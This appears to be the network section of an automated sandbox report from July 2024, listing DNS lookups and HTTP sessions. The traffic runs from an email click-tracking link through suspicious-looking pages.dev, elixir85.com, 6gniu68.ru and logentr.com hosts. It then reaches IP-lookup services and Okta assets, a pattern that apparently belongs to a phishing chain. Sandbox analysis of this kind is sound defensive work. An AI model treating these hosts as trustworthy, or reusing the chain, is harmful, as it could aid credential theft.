                                                        Jul 3, 2024 21:07:19.821944952 CEST192.168.2.51.1.1.10x4d70Standard query (0)cdn.socket.io65IN (0x0001)false
                                                        Jul 3, 2024 21:07:19.822221041 CEST192.168.2.51.1.1.10x1927Standard query (0)github.comA (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:19.822566032 CEST192.168.2.51.1.1.10xacc9Standard query (0)github.com65IN (0x0001)false
                                                        Jul 3, 2024 21:07:19.823036909 CEST192.168.2.51.1.1.10xde4bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:19.823349953 CEST192.168.2.51.1.1.10xaa56Standard query (0)www.google.com65IN (0x0001)false
                                                        Jul 3, 2024 21:07:19.834975004 CEST192.168.2.51.1.1.10xe606Standard query (0)ok4static.oktacdn.comA (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:19.835370064 CEST192.168.2.51.1.1.10x4088Standard query (0)ok4static.oktacdn.com65IN (0x0001)false
                                                        Jul 3, 2024 21:07:21.043104887 CEST192.168.2.51.1.1.10xd198Standard query (0)objects.githubusercontent.comA (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:21.043479919 CEST192.168.2.51.1.1.10xae7fStandard query (0)objects.githubusercontent.com65IN (0x0001)false
                                                        Jul 3, 2024 21:07:22.703490973 CEST192.168.2.51.1.1.10xffd3Standard query (0)ok4static.oktacdn.comA (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:22.703933954 CEST192.168.2.51.1.1.10xf595Standard query (0)ok4static.oktacdn.com65IN (0x0001)false
                                                        Jul 3, 2024 21:07:24.826817989 CEST192.168.2.51.1.1.10xa551Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:24.828660965 CEST192.168.2.51.1.1.10x28cdStandard query (0)httpbin.org65IN (0x0001)false
                                                        Jul 3, 2024 21:07:26.185770988 CEST192.168.2.51.1.1.10x45d5Standard query (0)ipapi.coA (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:26.185771942 CEST192.168.2.51.1.1.10xa667Standard query (0)ipapi.co65IN (0x0001)false
                                                        Jul 3, 2024 21:07:26.188792944 CEST192.168.2.51.1.1.10xb496Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:26.189038038 CEST192.168.2.51.1.1.10x9823Standard query (0)httpbin.org65IN (0x0001)false
                                                        Jul 3, 2024 21:07:27.024822950 CEST192.168.2.51.1.1.10xf9bdStandard query (0)ysh.logentr.comA (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:27.025007963 CEST192.168.2.51.1.1.10x6885Standard query (0)ysh.logentr.com65IN (0x0001)false
                                                        Jul 3, 2024 21:07:27.025450945 CEST192.168.2.51.1.1.10xe833Standard query (0)ipapi.coA (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:27.025664091 CEST192.168.2.51.1.1.10x37a7Standard query (0)ipapi.co65IN (0x0001)false
                                                        Jul 3, 2024 21:07:27.994126081 CEST192.168.2.51.1.1.10xa612Standard query (0)ysh.logentr.comA (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:27.994292974 CEST192.168.2.51.1.1.10x200Standard query (0)ysh.logentr.com65IN (0x0001)false
                                                        Jul 3, 2024 21:07:48.890554905 CEST192.168.2.51.1.1.10x35f7Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:48.890791893 CEST192.168.2.51.1.1.10x25c9Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Jul 3, 2024 21:06:35.901743889 CEST1.1.1.1192.168.2.50x3346No error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:35.903613091 CEST1.1.1.1192.168.2.50xd7fNo error (0)www.google.com65IN (0x0001)false
                                                        Jul 3, 2024 21:06:37.297909975 CEST1.1.1.1192.168.2.50x413No error (0)link.mail.beehiiv.com104.18.69.40A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:37.297909975 CEST1.1.1.1192.168.2.50x413No error (0)link.mail.beehiiv.com104.18.68.40A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:37.299806118 CEST1.1.1.1192.168.2.50x1334No error (0)link.mail.beehiiv.com65IN (0x0001)false
                                                        Jul 3, 2024 21:06:38.117057085 CEST1.1.1.1192.168.2.50xa421No error (0)ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.dev65IN (0x0001)false
                                                        Jul 3, 2024 21:06:38.121570110 CEST1.1.1.1192.168.2.50x1b80No error (0)ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.dev172.66.45.7A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:38.121570110 CEST1.1.1.1192.168.2.50x1b80No error (0)ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.dev172.66.46.249A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:39.896703005 CEST1.1.1.1192.168.2.50x6a7cNo error (0)rfwai.elixir85.com104.21.89.143A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:39.896703005 CEST1.1.1.1192.168.2.50x6a7cNo error (0)rfwai.elixir85.com172.67.160.220A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:39.897300959 CEST1.1.1.1192.168.2.50xe116No error (0)rfwai.elixir85.com65IN (0x0001)false
                                                        Jul 3, 2024 21:06:40.963645935 CEST1.1.1.1192.168.2.50x8ad2No error (0)ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.dev172.66.45.7A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:40.963645935 CEST1.1.1.1192.168.2.50x8ad2No error (0)ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.dev172.66.46.249A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:40.973855019 CEST1.1.1.1192.168.2.50x226fNo error (0)ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.dev65IN (0x0001)false
                                                        Jul 3, 2024 21:06:48.776010990 CEST1.1.1.1192.168.2.50xb699No error (0)zichd.6gniu68.ru188.114.97.3A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:48.776010990 CEST1.1.1.1192.168.2.50xb699No error (0)zichd.6gniu68.ru188.114.96.3A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:48.818064928 CEST1.1.1.1192.168.2.50xf6No error (0)zichd.6gniu68.ru65IN (0x0001)false
                                                        Jul 3, 2024 21:06:48.889877081 CEST1.1.1.1192.168.2.50xe92No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:49.861932039 CEST1.1.1.1192.168.2.50x172cNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:49.861932039 CEST1.1.1.1192.168.2.50x172cNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:49.861932039 CEST1.1.1.1192.168.2.50x172cNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:49.861932039 CEST1.1.1.1192.168.2.50x172cNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:49.863852024 CEST1.1.1.1192.168.2.50x4ab8No error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:49.863852024 CEST1.1.1.1192.168.2.50x4ab8No error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:49.864905119 CEST1.1.1.1192.168.2.50x62c4No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                        Jul 3, 2024 21:06:49.865505934 CEST1.1.1.1192.168.2.50x4666No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                        Jul 3, 2024 21:06:49.865849972 CEST1.1.1.1192.168.2.50xd028No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:49.865849972 CEST1.1.1.1192.168.2.50xd028No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:49.892201900 CEST1.1.1.1192.168.2.50x1520No error (0)zichd.6gniu68.ru65IN (0x0001)false
                                                        Jul 3, 2024 21:06:50.013181925 CEST1.1.1.1192.168.2.50xd5edNo error (0)zichd.6gniu68.ru188.114.97.3A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:50.013181925 CEST1.1.1.1192.168.2.50xd5edNo error (0)zichd.6gniu68.ru188.114.96.3A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:51.439456940 CEST1.1.1.1192.168.2.50xb5b2No error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:51.439456940 CEST1.1.1.1192.168.2.50xb5b2No error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:51.442002058 CEST1.1.1.1192.168.2.50xc985No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                        Jul 3, 2024 21:06:52.966876984 CEST1.1.1.1192.168.2.50x550eNo error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:52.966876984 CEST1.1.1.1192.168.2.50x550eNo error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:06:52.969553947 CEST1.1.1.1192.168.2.50x47b3No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                        Jul 3, 2024 21:07:15.932446003 CEST1.1.1.1192.168.2.50x3f9eNo error (0)rfwai.elixir85.com65IN (0x0001)false
                                                        Jul 3, 2024 21:07:15.960339069 CEST1.1.1.1192.168.2.50x7ff2No error (0)rfwai.elixir85.com104.21.89.143A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:15.960339069 CEST1.1.1.1192.168.2.50x7ff2No error (0)rfwai.elixir85.com172.67.160.220A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:19.829631090 CEST1.1.1.1192.168.2.50x1927No error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:19.830678940 CEST1.1.1.1192.168.2.50xaa56No error (0)www.google.com65IN (0x0001)false
                                                        Jul 3, 2024 21:07:19.831027031 CEST1.1.1.1192.168.2.50x4d70No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                        Jul 3, 2024 21:07:19.831792116 CEST1.1.1.1192.168.2.50x2800No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                        Jul 3, 2024 21:07:19.831792116 CEST1.1.1.1192.168.2.50x2800No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.33A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:19.831792116 CEST1.1.1.1192.168.2.50x2800No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.89A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:19.831792116 CEST1.1.1.1192.168.2.50x2800No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.78A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:19.831792116 CEST1.1.1.1192.168.2.50x2800No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.5A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:19.834733963 CEST1.1.1.1192.168.2.50xde4bNo error (0)www.google.com142.250.186.164A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:19.846872091 CEST1.1.1.1192.168.2.50xe606No error (0)ok4static.oktacdn.comd19d360lklgih4.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                        Jul 3, 2024 21:07:19.846872091 CEST1.1.1.1192.168.2.50xe606No error (0)d19d360lklgih4.cloudfront.net108.156.39.60A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:19.846872091 CEST1.1.1.1192.168.2.50xe606No error (0)d19d360lklgih4.cloudfront.net108.156.39.118A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:19.846872091 CEST1.1.1.1192.168.2.50xe606No error (0)d19d360lklgih4.cloudfront.net108.156.39.24A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:19.846872091 CEST1.1.1.1192.168.2.50xe606No error (0)d19d360lklgih4.cloudfront.net108.156.39.22A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:19.847857952 CEST1.1.1.1192.168.2.50x4088No error (0)ok4static.oktacdn.comd19d360lklgih4.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                        Jul 3, 2024 21:07:21.051652908 CEST1.1.1.1192.168.2.50xd198No error (0)objects.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:21.051652908 CEST1.1.1.1192.168.2.50xd198No error (0)objects.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:21.051652908 CEST1.1.1.1192.168.2.50xd198No error (0)objects.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:21.051652908 CEST1.1.1.1192.168.2.50xd198No error (0)objects.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:22.713237047 CEST1.1.1.1192.168.2.50xffd3No error (0)ok4static.oktacdn.comd19d360lklgih4.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                        Jul 3, 2024 21:07:22.713237047 CEST1.1.1.1192.168.2.50xffd3No error (0)d19d360lklgih4.cloudfront.net65.9.86.83A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:22.713237047 CEST1.1.1.1192.168.2.50xffd3No error (0)d19d360lklgih4.cloudfront.net65.9.86.22A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:22.713237047 CEST1.1.1.1192.168.2.50xffd3No error (0)d19d360lklgih4.cloudfront.net65.9.86.56A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:22.713237047 CEST1.1.1.1192.168.2.50xffd3No error (0)d19d360lklgih4.cloudfront.net65.9.86.73A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:22.716528893 CEST1.1.1.1192.168.2.50xf595No error (0)ok4static.oktacdn.comd19d360lklgih4.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                        Jul 3, 2024 21:07:24.837363958 CEST1.1.1.1192.168.2.50xa551No error (0)httpbin.org18.214.17.35A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:24.837363958 CEST1.1.1.1192.168.2.50xa551No error (0)httpbin.org3.227.135.8A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:26.192797899 CEST1.1.1.1192.168.2.50x45d5No error (0)ipapi.co172.67.69.226A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:26.192797899 CEST1.1.1.1192.168.2.50x45d5No error (0)ipapi.co104.26.9.44A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:26.192797899 CEST1.1.1.1192.168.2.50x45d5No error (0)ipapi.co104.26.8.44A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:26.196209908 CEST1.1.1.1192.168.2.50xa667No error (0)ipapi.co65IN (0x0001)false
                                                        Jul 3, 2024 21:07:26.196645021 CEST1.1.1.1192.168.2.50xb496No error (0)httpbin.org3.227.135.8A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:26.196645021 CEST1.1.1.1192.168.2.50xb496No error (0)httpbin.org18.214.17.35A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:27.033121109 CEST1.1.1.1192.168.2.50xe833No error (0)ipapi.co172.67.69.226A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:27.033121109 CEST1.1.1.1192.168.2.50xe833No error (0)ipapi.co104.26.8.44A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:27.033121109 CEST1.1.1.1192.168.2.50xe833No error (0)ipapi.co104.26.9.44A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:27.035089970 CEST1.1.1.1192.168.2.50x37a7No error (0)ipapi.co65IN (0x0001)false
                                                        Jul 3, 2024 21:07:27.057703018 CEST1.1.1.1192.168.2.50x6885No error (0)ysh.logentr.com65IN (0x0001)false
                                                        Jul 3, 2024 21:07:27.075392008 CEST1.1.1.1192.168.2.50xf9bdNo error (0)ysh.logentr.com188.114.97.3A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:27.075392008 CEST1.1.1.1192.168.2.50xf9bdNo error (0)ysh.logentr.com188.114.96.3A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:28.013878107 CEST1.1.1.1192.168.2.50xa612No error (0)ysh.logentr.com188.114.97.3A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:28.013878107 CEST1.1.1.1192.168.2.50xa612No error (0)ysh.logentr.com188.114.96.3A (IP address)IN (0x0001)false
                                                        Jul 3, 2024 21:07:28.013891935 CEST1.1.1.1192.168.2.50x200No error (0)ysh.logentr.com65IN (0x0001)false
                                                        Jul 3, 2024 21:07:48.899106026 CEST1.1.1.1192.168.2.50x35f7No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                        • login.live.com
                                                        • link.mail.beehiiv.com
                                                        • ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.dev
                                                        • https:
                                                          • rfwai.elixir85.com
                                                          • zichd.6gniu68.ru
                                                          • code.jquery.com
                                                          • challenges.cloudflare.com
                                                          • cdnjs.cloudflare.com
                                                          • www.google.com
                                                          • github.com
                                                          • ok4static.oktacdn.com
                                                          • cdn.socket.io
                                                          • objects.githubusercontent.com
                                                          • httpbin.org
                                                          • ipapi.co
                                                          • ysh.logentr.com
                                                        • fs.microsoft.com
                                                        • a.nel.cloudflare.com
                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        0192.168.2.54971420.190.159.23443
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:34 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                        Connection: Keep-Alive
                                                        Content-Type: application/soap+xml
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                        Content-Length: 3592
                                                        Host: login.live.com
                                                        2024-07-03 19:06:34 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                        2024-07-03 19:06:35 UTC569INHTTP/1.1 200 OK
                                                        Cache-Control: no-store, no-cache
                                                        Pragma: no-cache
                                                        Content-Type: application/soap+xml; charset=utf-8
                                                        Expires: Wed, 03 Jul 2024 19:05:34 GMT
                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                        x-ms-route-info: C561_BAY
                                                        x-ms-request-id: 027292fa-5a5d-4895-bfbc-a0447d7a1ecd
                                                        PPServer: PPV: 30 H: PH1PEPF00012005 V: 0
                                                        X-Content-Type-Options: nosniff
                                                        Strict-Transport-Security: max-age=31536000
                                                        X-XSS-Protection: 1; mode=block
                                                        Date: Wed, 03 Jul 2024 19:06:35 GMT
                                                        Connection: close
                                                        Content-Length: 11390
                                                        2024-07-03 19:06:35 UTC11390INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1192.168.2.54971520.190.159.23443
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:36 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                        Connection: Keep-Alive
                                                        Content-Type: application/soap+xml
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                        Content-Length: 3592
                                                        Host: login.live.com
                                                        2024-07-03 19:06:36 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                        2024-07-03 19:06:37 UTC569INHTTP/1.1 200 OK
                                                        Cache-Control: no-store, no-cache
                                                        Pragma: no-cache
                                                        Content-Type: application/soap+xml; charset=utf-8
                                                        Expires: Wed, 03 Jul 2024 19:05:36 GMT
                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                        x-ms-route-info: C561_BAY
                                                        x-ms-request-id: 7cb6ad1d-723d-42ec-b338-6379ea4a8f61
                                                        PPServer: PPV: 30 H: PH1PEPF0001820E V: 0
                                                        X-Content-Type-Options: nosniff
                                                        Strict-Transport-Security: max-age=31536000
                                                        X-XSS-Protection: 1; mode=block
                                                        Date: Wed, 03 Jul 2024 19:06:36 GMT
                                                        Connection: close
                                                        Content-Length: 11390
                                                        2024-07-03 19:06:37 UTC11390INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.549727104.18.69.404433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:37 UTC1411OUTGET /ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D HTTP/1.1
                                                        Host: link.mail.beehiiv.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Upgrade-Insecure-Requests: 1
